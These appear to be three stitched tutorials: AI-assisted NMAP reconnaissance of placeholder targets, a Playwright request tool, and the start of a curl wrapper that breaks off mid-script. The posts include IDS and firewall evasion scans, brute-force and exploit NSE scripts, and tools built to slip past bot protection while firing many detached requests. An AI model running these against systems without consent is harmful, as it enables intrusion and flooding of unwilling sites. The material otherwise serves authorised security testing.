  • How to interpret multiple scan results holistically
  • Prioritization of security findings by severity
  • Claude’s ability to correlate findings across multiple scans

Deep Dive Exercise 2: Network Perimeter Reconnaissance

Scenario: You’re assessing the security perimeter of an organization with the domain company.example-target.com and a known IP range 198.51.100.0/24.

Claude Prompt:

Perform comprehensive network perimeter reconnaissance for company.example-target.com (IP range 198.51.100.0/24). I need to:

1. Discover all live hosts in the IP range
2. For each live host, identify:
   - Operating system
   - All open ports (full 65535 range)
   - Service versions
   - Potential vulnerabilities
3. Map the network topology and identify:
   - Firewalls and filtering
   - DMZ hosts vs internal hosts
   - Critical infrastructure (DNS, mail, web servers)
4. Test for common network misconfigurations:
   - Open DNS resolvers
   - Open mail relays
   - Unauthenticated database access
   - Unencrypted management protocols (Telnet, FTP)
5. Provide a network map and executive summary

Use slow timing (T2) to minimize detection risk and avoid false positives.

What Claude will do:

# Phase 1: Host Discovery
nmap -sn -T2 198.51.100.0/24

# Phase 2: OS Detection on Live Hosts
nmap -O -T2 198.51.100.0/24

# Phase 3: Comprehensive Port Scan (may suggest splitting into chunks)
nmap -p- -T2 198.51.100.0/24

# Phase 4: Service Version Detection
nmap -sV -T2 198.51.100.0/24

# Phase 5: Specific Service Checks
nmap -p 53 --script dns-recursion 198.51.100.0/24
nmap -p 25 --script smtp-open-relay 198.51.100.0/24
nmap -p 3306,5432,27017 --script mysql-empty-password,pgsql-brute,mongodb-databases 198.51.100.0/24
nmap -p 23,21 198.51.100.0/24

# Phase 6: Vulnerability Scanning on Critical Hosts
nmap --script vuln -T2 [critical-hosts]

Learning Outcomes:

  • Large-scale network scanning strategies
  • How to handle and analyze results from multiple hosts
  • Network segmentation analysis
  • Risk assessment across an entire network perimeter
  • Understanding firewall and filtering detection

Deep Dive Exercise 3: Advanced Vulnerability Research – Zero-Day Hunting

Scenario: You’ve discovered a host running potentially vulnerable services and want to do deep reconnaissance to identify potential zero-day vulnerabilities or chained exploits.

Claude Prompt:

I've found a server at secure-server.example-target.com that's running multiple services. I need advanced vulnerability research:

1. Aggressive version fingerprinting of all services
2. Check for version-specific CVEs in detected software
3. Look for unusual port combinations that might indicate custom applications
4. Test for default credentials on all identified services
5. Check for known backdoors in the detected software versions
6. Test for authentication bypass vulnerabilities
7. Look for information disclosure issues (version strings, debug info, error messages)
8. Test for timing attacks and race conditions
9. Analyze for possible exploit chains (e.g., LFI -> RCE)
10. Provide detailed analysis with CVSS scores and exploit availability

Run this aggressively (-T4) as we have permission for intensive testing.

What Claude will do:

# Phase 1: Aggressive Fingerprinting
nmap -sV --version-intensity 9 -T4 secure-server.example-target.com

# Phase 2: All Vulnerability Scripts
nmap --script vuln,exploit -T4 secure-server.example-target.com

# Phase 3: Default Credential Testing
nmap --script auth -T4 secure-server.example-target.com

# Phase 4: Backdoor Detection
nmap --script ftp-vsftpd-backdoor,irc-unrealircd-backdoor,unusual-port -T4 secure-server.example-target.com

# Phase 5: Authentication Testing
nmap --script auth,brute -T4 secure-server.example-target.com

# Phase 6: Information Disclosure
nmap --script banner,http-errors,http-git,http-svn-enum -T4 secure-server.example-target.com

# Phase 7: Service-Specific Deep Dives
# (Claude will run targeted scripts based on discovered services)

After scans, Claude will:

  • Cross-reference detected versions with CVE databases
  • Explain potential exploit chains
  • Provide PoC (Proof of Concept) suggestions
  • Recommend remediation priorities
  • Suggest additional manual testing techniques

Learning Outcomes:

  • Advanced NSE scripting capabilities
  • How to correlate vulnerabilities for exploit chains
  • Understanding vulnerability severity and exploitability
  • Version-specific vulnerability research
  • Claude’s ability to provide context from its training data about specific CVEs

Part 5: Wide-Ranging Reconnaissance Exercises

Exercise 5.1: Subdomain Discovery and Mapping

Prompt:

Help me discover all subdomains of example-target.com and create a complete map of their infrastructure. For each subdomain found:
- Resolve its IP addresses
- Check if it's hosted on the same infrastructure
- Identify the services running
- Note any interesting or unusual findings

Also check for common subdomain patterns like api, dev, staging, admin, etc.

What this reveals: Shadow IT, forgotten dev servers, API endpoints, and the organization’s infrastructure footprint.
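
The MCP server can drive NMAP's dns-brute script for this, and the "common patterns" check is also easy to prototype yourself. A minimal sketch (candidate labels and the domain are illustrative):

import socket

# Hypothetical candidate labels; extend with a proper wordlist
candidates = ["api", "dev", "staging", "admin", "mail", "vpn"]
domain = "example-target.com"

for label in candidates:
    host = f"{label}.{domain}"
    try:
        # gethostbyname returns the first A record; use getaddrinfo for AAAA
        print(f"{host} -> {socket.gethostbyname(host)}")
    except socket.gaierror:
        pass  # name does not resolve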

Exercise 5.2: API Security Testing

Prompt:

I've found an API at api.example-target.com. Please:
1. Identify the API type (REST, GraphQL, SOAP)
2. Discover all available endpoints
3. Test authentication mechanisms
4. Check for rate limiting
5. Test for IDOR (Insecure Direct Object References)
6. Look for excessive data exposure
7. Test for injection vulnerabilities
8. Check API versioning and test old versions for vulnerabilities
9. Verify CORS configuration
10. Test for JWT vulnerabilities if applicable

Exercise 5.3: Cloud Infrastructure Detection

Prompt:

Scan example-target.com to identify if they're using cloud infrastructure (AWS, Azure, GCP). Look for:
- Cloud-specific IP ranges
- S3 buckets or blob storage
- Cloud-specific services (CloudFront, Azure CDN, etc.)
- Misconfigured cloud resources
- Storage bucket permissions
- Cloud metadata services exposure

Exercise 5.4: IoT and Embedded Device Discovery

Prompt:

Scan the network 192.168.1.0/24 for IoT and embedded devices such as:
- IP cameras
- Smart TVs
- Printers
- Network attached storage (NAS)
- Home automation systems
- Industrial control systems (ICS/SCADA if applicable)

Check each device for:
- Default credentials
- Outdated firmware
- Unencrypted communications
- Exposed management interfaces

Exercise 5.5: Checking for Known Vulnerabilities and Old Software

Prompt:

Perform a comprehensive audit of example-target.com focusing on outdated and vulnerable software:

1. Detect exact versions of all running services
2. For each service, check if it's end-of-life (EOL)
3. Identify known CVEs for each version detected
4. Prioritize findings by:
   - CVSS score
   - Exploit availability
   - Exposure (internet-facing vs internal)
5. Check for:
   - Outdated TLS/SSL versions
   - Deprecated cryptographic algorithms
   - Unpatched web frameworks
   - Old CMS versions (WordPress, Joomla, Drupal)
   - Legacy protocols (SSLv3, TLS 1.0, weak ciphers)
6. Generate a remediation roadmap with version upgrade recommendations

Expected approach:

# Detailed version detection
nmap -sV --version-intensity 9 example-target.com

# Check for versionable services
nmap --script version,http-server-header,http-generator example-target.com

# SSL/TLS testing
nmap -p 443 --script ssl-cert,ssl-enum-ciphers,sslv2,ssl-date example-target.com

# CMS detection
nmap -p 80,443 --script http-wordpress-enum,http-joomla-brute,http-drupal-enum example-target.com

Claude will then analyze the results and provide:

  • A table of detected software with current versions and latest versions
  • CVE listings with severity scores
  • Specific upgrade recommendations
  • Risk assessment for each finding

Part 6: Advanced Tips and Techniques

6.1 Optimizing Scan Performance

Timing Templates:

  • -T0 (Paranoid): Extremely slow, for IDS evasion
  • -T1 (Sneaky): Slow, minimal detection risk
  • -T2 (Polite): Slower, less bandwidth intensive
  • -T3 (Normal): Default, balanced approach
  • -T4 (Aggressive): Faster, assumes good network
  • -T5 (Insane): Extremely fast, may miss results

Prompt:

Explain when to use each NMAP timing template and demonstrate the difference by scanning example-target.com with T2 and T4 timing.

6.2 Evading Firewalls and IDS

Prompt:

Scan example-target.com using techniques to evade firewalls and intrusion detection systems:
- Fragment packets
- Use decoy IP addresses
- Randomize scan order
- Use idle scan if possible
- Spoof MAC address (if on local network)
- Use source port 53 or 80 to bypass egress filtering

Expected command examples:

# Fragmented packets
nmap -f example-target.com

# Decoy scan
nmap -D RND:10 example-target.com

# Randomize hosts
nmap --randomize-hosts example-target.com

# Source port spoofing
nmap --source-port 53 example-target.com

6.3 Creating Custom NSE Scripts with Claude

Prompt:

Help me create a custom NSE script that checks for a specific vulnerability in our custom application running on port 8080. The vulnerability is that the /debug endpoint returns sensitive configuration data without authentication.

Claude can help you write Lua scripts for NMAP’s scripting engine!

6.4 Output Parsing and Reporting

Prompt:

Scan example-target.com and save results in all available formats (normal, XML, grepable, script kiddie). Then help me parse the XML output to extract just the critical and high severity findings for a report.

Expected command:

nmap -oA scan_results example-target.com

Claude can then help you parse the XML file programmatically.
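
For example, a minimal sketch that extracts open ports from the XML output (assuming the scan_results.xml file produced by -oA scan_results above):

import xml.etree.ElementTree as ET

tree = ET.parse("scan_results.xml")

# Walk hosts -> ports and print everything NMAP reports as open
for host in tree.getroot().iter("host"):
    addr = host.find("address").get("addr")
    for port in host.iter("port"):
        if port.find("state").get("state") == "open":
            svc = port.find("service")
            name = svc.get("name", "unknown") if svc is not None else "unknown"
            print(f"{addr} {port.get('protocol')}/{port.get('portid')} {name}")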

Part 7: Responsible Disclosure and Next Steps

After Finding Vulnerabilities

  1. Document everything: Keep detailed records of your findings
  2. Prioritize by risk: Use CVSS scores and business impact
  3. Responsible disclosure: Follow the organization’s security policy
  4. Remediation tracking: Help create an action plan
  5. Verify fixes: Re-test after patches are applied

Using Claude for Post-Scan Analysis

Prompt:

I've completed my NMAP scans and found 15 vulnerabilities. Here are the results: [paste scan output]. 

Please:
1. Categorize by severity (Critical, High, Medium, Low, Info)
2. Explain each vulnerability in business terms
3. Provide remediation steps for each
4. Suggest a remediation priority order
5. Draft an executive summary for management
6. Create technical remediation tickets for the engineering team

Claude excels at translating technical scan results into actionable business intelligence.

Part 8: Continuous Monitoring with NMAP and Claude

Set up regular scanning routines and use Claude to track changes:

Prompt:

Create a baseline scan of example-target.com and save it. Then help me set up a cron job (or scheduled task) to run weekly scans and alert me to any changes in:
- New open ports
- Changed service versions
- New hosts discovered
- Changes in vulnerabilities detected
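
NMAP also ships an ndiff utility for comparing two XML scans, and a port-level diff is simple to script yourself. A minimal sketch (file names are illustrative):

import xml.etree.ElementTree as ET

def open_ports(xml_file):
    """Return the set of (address, protocol, port) tuples in state 'open'."""
    found = set()
    for host in ET.parse(xml_file).getroot().iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") == "open":
                found.add((addr, port.get("protocol"), port.get("portid")))
    return found

baseline = open_ports("baseline.xml")
current = open_ports("weekly.xml")
print("Newly opened:", sorted(current - baseline))
print("Newly closed:", sorted(baseline - current))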

Conclusion

Combining NMAP’s powerful network scanning capabilities with Claude’s AI-driven analysis creates a formidable security assessment toolkit. The Model Context Protocol bridges these tools seamlessly, allowing you to:

  • Express complex scanning requirements in natural language
  • Get intelligent interpretation of scan results
  • Receive contextual security advice
  • Automate repetitive reconnaissance tasks
  • Learn security concepts through interactive exploration

Key Takeaways:

  1. Always get permission before scanning any network or system
  2. Start with gentle scans and progressively get more aggressive
  3. Use timing controls to avoid overwhelming targets or triggering alarms
  4. Correlate multiple scans for a complete security picture
  5. Leverage Claude’s knowledge to interpret results and suggest next steps
  6. Document everything for compliance and knowledge sharing
  7. Keep NMAP updated to benefit from the latest scripts and capabilities

The examples provided in this guide demonstrate just a fraction of what’s possible when combining NMAP with AI assistance. As you become more comfortable with this workflow, you’ll discover new ways to leverage Claude’s understanding to make your security assessments more efficient and comprehensive.

About the Author: This guide was created to help security professionals and system administrators leverage AI assistance for more effective network reconnaissance and vulnerability assessment.

Last Updated: 2025-11-21

Version: 1.0


Building an advanced Browser Curl Script with Playwright and Selenium for load testing websites

Modern sites often block plain curl. Using a real browser engine (Chromium via Playwright) gives you true browser behavior: real TLS/HTTP2 stack, cookies, redirects, and JavaScript execution if needed. This post mirrors the functionality of the original browser_curl.sh wrapper but implemented with Playwright. It also includes an optional Selenium mini-variant at the end.

What this tool does

  • Sends realistic browser headers (Chrome-like)
  • Uses Chromium’s real network stack (HTTP/2, compression)
  • Manages cookies (persist to a file)
  • Follows redirects by default
  • Supports JSON and form POSTs
  • Async mode that returns immediately
  • --count N to dispatch N async requests for quick load tests

Note: Advanced bot defenses (CAPTCHAs, JS/ML challenges, strict TLS/HTTP2 fingerprinting) may still require full page automation and real user-like behavior. Playwright can do that too by driving real pages.

Setup

Run these once to install Playwright and Chromium:

npm init -y && \
npm install playwright && \
npx playwright install chromium

The complete Playwright CLI

Run this to create browser_playwright.mjs:

cat > browser_playwright.mjs << 'EOF'
#!/usr/bin/env node
import { chromium } from 'playwright';
import fs from 'fs';
import path from 'path';
import { spawn } from 'child_process';
const RED = '\u001b[31m';
const GRN = '\u001b[32m';
const YLW = '\u001b[33m';
const NC  = '\u001b[0m';
function usage() {
  const b = path.basename(process.argv[1]);
  console.log(`Usage: ${b} [OPTIONS] URL
Advanced HTTP client using Playwright (Chromium) with browser-like behavior.
OPTIONS:
  -X, --method METHOD        HTTP method (GET, POST, PUT, DELETE) [default: GET]
  -d, --data DATA            Request body
  -H, --header HEADER        Add custom header (repeatable)
  -o, --output FILE          Write response body to file
  -c, --cookie FILE          Cookie storage file [default: /tmp/pw_cookies_<pid>.json]
  -A, --user-agent UA        Custom User-Agent
  -t, --timeout SECONDS      Request timeout [default: 30]
      --async                Run request(s) in background
      --count N              Number of async requests to fire [default: 1, requires --async]
      --no-redirect          Do not follow redirects (best-effort)
      --show-headers         Print response headers
      --json                 Send data as JSON (sets Content-Type)
      --form                 Send data as application/x-www-form-urlencoded
  -v, --verbose              Verbose output
  -h, --help                 Show this help message
EXAMPLES:
  ${b} https://example.com
  ${b} --async https://example.com
  ${b} -X POST --json -d '{"a":1}' https://httpbin.org/post
  ${b} --async --count 10 https://httpbin.org/get
`);
}
function parseArgs(argv) {
  const args = { method: 'GET', async: false, count: 1, followRedirects: true, showHeaders: false, timeout: 30, data: '', contentType: '', cookieFile: '', verbose: false, headers: [], url: '' };
  for (let i = 0; i < argv.length; i++) {
    const a = argv[i];
    switch (a) {
      case '-X': case '--method': args.method = String(argv[++i] || 'GET'); break;
      case '-d': case '--data': args.data = String(argv[++i] || ''); break;
      case '-H': case '--header': args.headers.push(String(argv[++i] || '')); break;
      case '-o': case '--output': args.output = String(argv[++i] || ''); break;
      case '-c': case '--cookie': args.cookieFile = String(argv[++i] || ''); break;
      case '-A': case '--user-agent': args.userAgent = String(argv[++i] || ''); break;
      case '-t': case '--timeout': args.timeout = Number(argv[++i] || '30'); break;
      case '--async': args.async = true; break;
      case '--count': args.count = Number(argv[++i] || '1'); break;
      case '--no-redirect': args.followRedirects = false; break;
      case '--show-headers': args.showHeaders = true; break;
      case '--json': args.contentType = 'application/json'; break;
      case '--form': args.contentType = 'application/x-www-form-urlencoded'; break;
      case '-v': case '--verbose': args.verbose = true; break;
      case '-h': case '--help': usage(); process.exit(0);
      default:
        if (!args.url && !a.startsWith('-')) args.url = a; else {
          console.error(`${RED}Error: Unknown argument: ${a}${NC}`);
          process.exit(1);
        }
    }
  }
  return args;
}
function parseHeaderList(list) {
  const out = {};
  for (const h of list) {
    const idx = h.indexOf(':');
    if (idx === -1) continue;
    const name = h.slice(0, idx).trim();
    const value = h.slice(idx + 1).trim();
    if (!name) continue;
    out[name] = value;
  }
  return out;
}
function buildDefaultHeaders(userAgent) {
  const ua = userAgent || 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36';
  return {
    'User-Agent': ua,
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.9',
    'Accept-Encoding': 'gzip, deflate, br',
    'Connection': 'keep-alive',
    'Upgrade-Insecure-Requests': '1',
    'Sec-Fetch-Dest': 'document',
    'Sec-Fetch-Mode': 'navigate',
    'Sec-Fetch-Site': 'none',
    'Sec-Fetch-User': '?1',
    'Cache-Control': 'max-age=0'
  };
}
async function performRequest(opts) {
  // Cookie file handling
  const defaultCookie = `/tmp/pw_cookies_${process.pid}.json`;
  const cookieFile = opts.cookieFile || defaultCookie;
  // Launch Chromium
  const browser = await chromium.launch({ headless: true });
  const extraHeaders = { ...buildDefaultHeaders(opts.userAgent), ...parseHeaderList(opts.headers) };
  if (opts.contentType) extraHeaders['Content-Type'] = opts.contentType;
  const context = await browser.newContext({ userAgent: extraHeaders['User-Agent'], extraHTTPHeaders: extraHeaders });
  // Load cookies if present
  if (fs.existsSync(cookieFile)) {
    try {
      const ss = JSON.parse(fs.readFileSync(cookieFile, 'utf8'));
      if (ss.cookies?.length) await context.addCookies(ss.cookies);
    } catch {}
  }
  const request = context.request;
  // Build request options
  const reqOpts = { headers: extraHeaders, timeout: opts.timeout * 1000 };
  if (opts.data) {
    // Playwright will detect JSON strings vs form strings by headers
    reqOpts.data = opts.data;
  }
  if (opts.followRedirects === false) {
    // Best-effort: limit redirects to 0
    reqOpts.maxRedirects = 0;
  }
  const method = opts.method.toUpperCase();
  let resp;
  try {
    if (method === 'GET') resp = await request.get(opts.url, reqOpts);
    else if (method === 'POST') resp = await request.post(opts.url, reqOpts);
    else if (method === 'PUT') resp = await request.put(opts.url, reqOpts);
    else if (method === 'DELETE') resp = await request.delete(opts.url, reqOpts);
    else if (method === 'PATCH') resp = await request.patch(opts.url, reqOpts);
    else {
      console.error(`${RED}Unsupported method: ${method}${NC}`);
      await browser.close();
      process.exit(2);
    }
  } catch (e) {
    console.error(`${RED}[ERROR] ${e?.message || e}${NC}`);
    await browser.close();
    process.exit(3);
  }
  // Persist cookies
  try {
    const state = await context.storageState();
    fs.writeFileSync(cookieFile, JSON.stringify(state, null, 2));
  } catch {}
  // Output
  const status = resp.status();
  const statusText = resp.statusText();
  const headers = await resp.headers();
  const body = await resp.text();
  if (opts.verbose) {
    console.error(`${YLW}Request: ${method} ${opts.url}${NC}`);
    console.error(`${YLW}Headers: ${JSON.stringify(extraHeaders)}${NC}`);
  }
  if (opts.showHeaders) {
    // Print a simple status line and headers to stdout before body
    console.log(`HTTP ${status} ${statusText}`);
    for (const [k, v] of Object.entries(headers)) {
      console.log(`${k}: ${v}`);
    }
    console.log('');
  }
  if (opts.output) {
    fs.writeFileSync(opts.output, body);
  } else {
    process.stdout.write(body);
  }
  if (!resp.ok()) {
    console.error(`${RED}[ERROR] HTTP ${status} ${statusText}${NC}`);
    await browser.close();
    process.exit(4);
  }
  await browser.close();
}
async function main() {
  const argv = process.argv.slice(2);
  const opts = parseArgs(argv);
  if (!opts.url) { console.error(`${RED}Error: URL is required${NC}`); usage(); process.exit(1); }
  if ((opts.count || 1) > 1 && !opts.async) {
    console.error(`${RED}Error: --count requires --async${NC}`);
    process.exit(1);
  }
  if (opts.count < 1 || !Number.isInteger(opts.count)) {
    console.error(`${RED}Error: --count must be a positive integer${NC}`);
    process.exit(1);
  }
  if (opts.async) {
    // Fire-and-forget background processes.
    // Strip --async and --count <N> (the flag AND its value) before re-spawning,
    // otherwise the bare count value would be re-parsed as a stray argument.
    const raw = process.argv.slice(2);
    const baseArgs = [];
    for (let i = 0; i < raw.length; i++) {
      if (raw[i] === '--async') continue;
      if (raw[i] === '--count') { i++; continue; }
      baseArgs.push(raw[i]);
    }
    const pids = [];
    for (let i = 0; i < opts.count; i++) {
      const child = spawn(process.execPath, [process.argv[1], ...baseArgs], { detached: true, stdio: 'ignore' });
      pids.push(child.pid);
      child.unref();
    }
    if (opts.verbose) {
      console.error(`${YLW}[ASYNC] Spawned ${opts.count} request(s).${NC}`);
    }
    if (opts.count === 1) console.error(`${GRN}[ASYNC] Request started with PID: ${pids[0]}${NC}`);
    else console.error(`${GRN}[ASYNC] ${opts.count} requests started with PIDs: ${pids.join(' ')}${NC}`);
    process.exit(0);
  }
  await performRequest(opts);
}
main().catch(err => {
  console.error(`${RED}[FATAL] ${err?.stack || err}${NC}`);
  process.exit(1);
});
EOF
chmod +x browser_playwright.mjs

Optionally, move it into your PATH:

sudo mv browser_playwright.mjs /usr/local/bin/browser_playwright

Quick start

  • Simple GET:
node browser_playwright.mjs https://example.com
  • Async GET (returns immediately):
node browser_playwright.mjs --async https://example.com
  • Fire 100 async requests in one command:
node browser_playwright.mjs --async --count 100 https://httpbin.org/get

  • POST JSON:
node browser_playwright.mjs -X POST --json \
  -d '{"username":"user","password":"pass"}' \
  https://httpbin.org/post
  • POST form data:
node browser_playwright.mjs -X POST --form \
  -d "username=user&password=pass" \
  https://httpbin.org/post
  • Include response headers:
node browser_playwright.mjs --show-headers https://example.com
  • Save response to a file:
node browser_playwright.mjs -o response.json https://httpbin.org/json
  • Custom headers:
node browser_playwright.mjs \
  -H "X-API-Key: your-key" \
  -H "Authorization: Bearer token" \
  https://httpbin.org/headers
  • Persistent cookies across requests:
COOKIE_FILE="playwright_session.json"
# Login and save cookies
node browser_playwright.mjs -c "$COOKIE_FILE" \
  -X POST --form \
  -d "user=test&pass=secret" \
  https://httpbin.org/post > /dev/null
# Authenticated-like follow-up (cookie file reused)
node browser_playwright.mjs -c "$COOKIE_FILE" \
  https://httpbin.org/cookies

Load testing patterns

  • Simple load test with --count:
node browser_playwright.mjs --async --count 100 https://httpbin.org/get
  • Loop-based alternative:
for i in {1..100}; do
  node browser_playwright.mjs --async https://httpbin.org/get
done
  • Timed load test:
cat > pw_load_for_duration.sh << 'EOF'
#!/usr/bin/env bash
URL="${1:-https://httpbin.org/get}"
DURATION="${2:-60}"
COUNT=0
END_TIME=$(($(date +%s) + DURATION))
while [ "$(date +%s)" -lt "$END_TIME" ]; do
  node browser_playwright.mjs --async "$URL" >/dev/null 2>&1
  ((COUNT++))
done
echo "Sent $COUNT requests in $DURATION seconds"
echo "Rate: $((COUNT / DURATION)) requests/second"
EOF
chmod +x pw_load_for_duration.sh
./pw_load_for_duration.sh https://httpbin.org/get 30
  • Parameterized load test:
cat > pw_load_test.sh << 'EOF'
#!/usr/bin/env bash
URL="${1:-https://httpbin.org/get}"
REQUESTS="${2:-50}"
echo "Load testing: $URL"
echo "Requests: $REQUESTS"
echo ""
START=$(date +%s)
node browser_playwright.mjs --async --count "$REQUESTS" "$URL"
echo ""
echo "Dispatched in $(($(date +%s) - START)) seconds"
EOF
chmod +x pw_load_test.sh
./pw_load_test.sh https://httpbin.org/get 200

Options reference

  • -X, --method HTTP method (GET/POST/PUT/DELETE/PATCH)
  • -d, --data Request body
  • -H, --header Add extra headers (repeatable)
  • -o, --output Write response body to file
  • -c, --cookie Cookie file to use (and persist)
  • -A, --user-agent Override User-Agent
  • -t, --timeout Max request time in seconds (default 30)
  • --async Run request(s) in the background
  • --count N Fire N async requests (requires --async)
  • --no-redirect Best-effort disable following redirects
  • --show-headers Include response headers before body
  • --json Sets Content-Type: application/json
  • --form Sets Content-Type: application/x-www-form-urlencoded
  • -v, --verbose Verbose diagnostics

Validation rules:

  • --count requires --async
  • --count must be a positive integer

Under the hood: why this works better than plain curl

  • Real Chromium network stack (HTTP/2, TLS, compression)
  • Browser-like headers and a true User-Agent
  • Cookie jar via Playwright context storageState
  • Redirect handling by the browser stack

This helps pass simplistic bot checks and more closely resembles real user traffic.
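
A quick way to verify this is to compare what each client actually sends; httpbin.org/headers echoes request headers back (jq assumed installed):

curl -s https://httpbin.org/headers | jq .headers
node browser_playwright.mjs https://httpbin.org/headers | jq .headers

The second call should show a real Chrome User-Agent and a fuller Accept/Accept-Language set rather than curl's sparse defaults.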

Real-world examples

  • API-style auth flow (demo endpoints):
cat > pw_auth_flow.sh << 'EOF'
#!/usr/bin/env bash
COOKIE_FILE="pw_auth_session.json"
BASE="https://httpbin.org"
echo "Login (simulated form POST)..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
  -X POST --form \
  -d "user=user&pass=pass" \
  "$BASE/post" > /dev/null
echo "Fetch cookies..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
  "$BASE/cookies"
echo "Load test a protected-like endpoint..."
node browser_playwright.mjs -c "$COOKIE_FILE" \
  --async --count 20 \
  "$BASE/get"
echo "Done"
rm -f "$COOKIE_FILE"
EOF
chmod +x pw_auth_flow.sh
./pw_auth_flow.sh
  • Scraping with rate limiting:
cat > pw_scrape.sh << 'EOF'
#!/usr/bin/env bash
URLS=(
  "https://example.com/"
  "https://example.com/"
  "https://example.com/"
)
for url in "${URLS[@]}"; do
  echo "Fetching: $url"
  node browser_playwright.mjs -o "$(echo "$url" | sed 's#[/:]#_#g').html" "$url"
  sleep 2
done
EOF
chmod +x pw_scrape.sh
./pw_scrape.sh
  • Health check monitoring:
cat > pw_health.sh << 'EOF'
#!/usr/bin/env bash
ENDPOINT="${1:-https://httpbin.org/status/200}"
while true; do
  if node browser_playwright.mjs "$ENDPOINT" >/dev/null 2>&1; then
    echo "$(date): Service healthy"
  else
    echo "$(date): Service unhealthy"
  fi
  sleep 30
done
EOF
chmod +x pw_health.sh
./pw_health.sh

Troubleshooting

  • Hanging or quoting issues: ensure your shell quoting is balanced. Prefer simple commands without complex inline quoting.
  • Verbose mode too noisy: omit -v in production.
  • Cookie file format: the script writes Playwright storageState JSON. It’s safe to keep or delete.
  • 403 errors: site uses stronger protections. Drive a real page (Playwright page.goto) and interact, or solve CAPTCHAs where required.

Performance notes

Dispatch time depends on process spawn and Playwright startup. For higher throughput, consider reusing the same Node process to issue many requests (modify the script to loop internally) or use k6/Locust/Artillery for large-scale load testing.
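
To put a rough number on dispatch overhead on your own machine, a minimal sketch (assumes GNU date with %N support, as on Linux; on macOS install coreutils and use gdate):

START=$(date +%s%N)
node browser_playwright.mjs --async --count 50 https://httpbin.org/get
END=$(date +%s%N)
echo "Dispatched 50 requests in $(( (END - START) / 1000000 )) ms"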

Limitations

  • This CLI uses Playwright’s HTTP client bound to a Chromium context. It is much closer to real browsers than curl, but some advanced fingerprinting still detects automation.
  • WebSocket flows, MFA, or complex JS challenges generally require full page automation (which Playwright supports).

When to use what

  • Use this Playwright CLI when you need realistic browser behavior, cookies, and straightforward HTTP requests with quick async dispatch.
  • Use full Playwright page automation for dynamic content, complex logins, CAPTCHAs, and JS-heavy sites.

Advanced combos

  • With jq for JSON processing:
node browser_playwright.mjs https://httpbin.org/json | jq '.slideshow.title'
  • With parallel for concurrency:
echo -e "https://httpbin.org/get\nhttps://httpbin.org/headers" | \
parallel -j 5 "node browser_playwright.mjs -o {#}.json {}"
  • With watch for monitoring:
watch -n 5 "node browser_playwright.mjs https://httpbin.org/status/200 >/dev/null && echo ok || echo fail"
  • With xargs for batch processing:
echo -e "1\n2\n3" | xargs -I {} node browser_playwright.mjs "https://httpbin.org/anything/{}"

Future enhancements

  • Built-in rate limiting and retry logic
  • Output modes (JSON-only, headers-only)
  • Proxy support
  • Response assertions (status codes, content patterns)
  • Metrics collection (timings, success rates)

Minimal Selenium variant (Python)

If you prefer Selenium, here’s a minimal GET/redirect/cookie-capable script. Note: issuing cross-origin POST bodies is more ergonomic with Playwright’s request client, and Selenium cannot read response headers; it focuses on page automation.

Install Selenium:

python3 -m venv .venv && source .venv/bin/activate
pip install --upgrade pip selenium

Create browser_selenium.py:

cat > browser_selenium.py << 'EOF'
#!/usr/bin/env python3
import argparse, json, os, sys, time
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
RED='\033[31m'; GRN='\033[32m'; YLW='\033[33m'; NC='\033[0m'
def parse_args():
    p = argparse.ArgumentParser(description='Minimal Selenium GET client')
    p.add_argument('url')
    p.add_argument('-o','--output')
    p.add_argument('-c','--cookie', default=f"/tmp/selenium_cookies_{os.getpid()}.json")
    p.add_argument('-t','--timeout', type=int, default=30)
    p.add_argument('-A','--user-agent')
    p.add_argument('-v','--verbose', action='store_true')
    return p.parse_args()
args = parse_args()
opts = Options()
opts.add_argument('--headless=new')
if args.user_agent:
    opts.add_argument(f'--user-agent={args.user_agent}')
with webdriver.Chrome(options=opts) as driver:
    driver.set_page_load_timeout(args.timeout)
    # Load cookies if present (domain-specific; best-effort)
    if os.path.exists(args.cookie):
        try:
            ck = json.load(open(args.cookie))
            for c in ck.get('cookies', []):
                try:
                    driver.get('https://' + c.get('domain').lstrip('.'))
                    driver.add_cookie({
                        'name': c['name'], 'value': c['value'], 'path': c.get('path','/'),
                        'domain': c.get('domain'), 'secure': c.get('secure', False)
                    })
                except Exception:
                    pass
        except Exception:
            pass
    driver.get(args.url)
    # Persist cookies (best-effort)
    try:
        cookies = driver.get_cookies()
        json.dump({'cookies': cookies}, open(args.cookie, 'w'), indent=2)
    except Exception:
        pass
    if args.output:
        open(args.output, 'w').write(driver.page_source)
    else:
        sys.stdout.write(driver.page_source)
EOF
chmod +x browser_selenium.py

Use it:

./browser_selenium.py https://example.com > out.html

Conclusion

You now have a Playwright-powered CLI that mirrors the original curl-wrapper’s ergonomics but uses a real browser engine, plus a minimal Selenium alternative. Use the CLI for realistic headers, cookies, redirects, JSON/form POSTs, and async dispatch with --count. For tougher sites, scale up to full page automation with Playwright.


Building a Browser Curl Wrapper for Reliable HTTP Requests and Load Testing

Modern websites deploy bot defenses that can block plain curl or naive scripts. In many cases, adding the right browser-like headers, HTTP/2, cookie persistence, and compression gets you past basic filters without needing a full browser.

This post walks through a small shell utility, browser_curl.sh, that wraps curl with realistic browser behavior. It also supports “fire-and-forget” async requests and a --count flag to dispatch many requests at once for quick load tests.

What this script does

  • Sends browser-like headers (Chrome on macOS)
  • Uses HTTP/2 and compression
  • Manages cookies automatically (cookie jar)
  • Follows redirects by default
  • Supports JSON and form POSTs
  • Async mode that returns immediately
  • --count N to dispatch N async requests in one command

Note: This approach won’t solve advanced bot defenses that require JavaScript execution (e.g., Cloudflare Turnstile/CAPTCHAs or TLS/HTTP2 fingerprinting); for that, use a real browser automation tool like Playwright or Selenium.

The complete script

Save this as browser_curl.sh and make it executable in one command:

cat > browser_curl.sh << 'EOF' && chmod +x browser_curl.sh
#!/bin/bash

# browser_curl.sh - Advanced curl wrapper that mimics browser behavior
# Designed to bypass Cloudflare and other bot protection

# Colors for output
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
NC='\033[0m' # No Color

# Default values
METHOD="GET"
ASYNC=false
COUNT=1
FOLLOW_REDIRECTS=true
SHOW_HEADERS=false
OUTPUT_FILE=""
